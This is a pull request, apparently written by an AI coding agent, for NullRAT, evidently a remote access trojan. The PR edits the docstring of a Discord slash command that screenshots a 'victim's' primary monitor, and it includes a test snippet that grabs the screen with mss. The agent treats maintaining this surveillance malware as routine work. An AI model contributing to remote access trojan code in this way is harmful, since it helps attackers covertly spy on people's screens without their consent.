### PR TITLE
Clarify screenshot capture targets primary monitor

### DIFF
--- a/NullRAT/modules/screenshot.py
+++ b/NullRAT/modules/screenshot.py
@@ -12,7 +12,7 @@ class GetScreenshot(commands.Cog):
 
     @commands.slash_command()
     async def get_screenshot(self, ctx, victim):
-        """Sends screenshot of entire monitor
+        """Sends screenshot of the primary monitor
 
         Parameters
         ----------


### PR DESCRIPTION
## Summary
- Document that screenshot command captures the primary monitor

## Testing
- `python -m py_compile NullRAT/modules/screenshot.py`
- `python - <<'PY'
import mss, mss.tools
with mss.mss() as sct:
    img = sct.grab(sct.monitors[1])
    png = mss.tools.to_png(img.rgb, img.size)
print('captured bytes', len(png))
PY` *(fails: mss.exception.ScreenShotError: $DISPLAY not set)*

------
https://chatgpt.com/codex/tasks/task_e_689c631a35a48321848a23737b7f64ce